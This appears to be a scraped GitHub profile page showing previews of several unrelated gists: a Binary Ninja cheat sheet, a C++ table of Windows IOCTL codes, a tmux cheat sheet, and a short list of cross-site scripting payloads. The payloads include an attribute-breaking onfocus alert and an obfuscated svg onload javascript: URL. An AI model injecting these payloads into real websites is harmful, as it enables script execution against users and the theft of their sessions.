Skip to content

Instantly share code, notes, and snippets.

View mmssr's full-sized avatar

beep boop mmssr

View GitHub Profile
@alexander-hanel
alexander-hanel / bn-cheat.md
Last active December 28, 2025 10:05
Cheat Sheet for Binary Ninja
@daaximus
daaximus / ioctl_names.cpp
Last active February 23, 2026 17:37
Most IOCTLs mapped to their code names
typedef struct _ioctl_t
{
const char* ioctl_name;
uint64_t ctl_code;
} ioctl_t;
// This would likely be better used in some unordered map. This is just a temporary data structure for testing resolution.
//
// Results from NtDeviceIoControlFile hook:
// utweb.exe (14916) :: NtDeviceIoControlFile( 0x65c (\Device\Afd), 0x694, 0x0000000000000000, 0x0000000000000000, 0x00000000044DEE90, 0x12024 (IOCTL_AFD_SELECT), 0x0000000004A3FC18, 0x34, 0x0000000004A3FC18, 0x34 )
" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
# Internet Explorer, Edge
<svg><script>alert(1)<p>
# Firefox
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active March 10, 2026 02:54
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname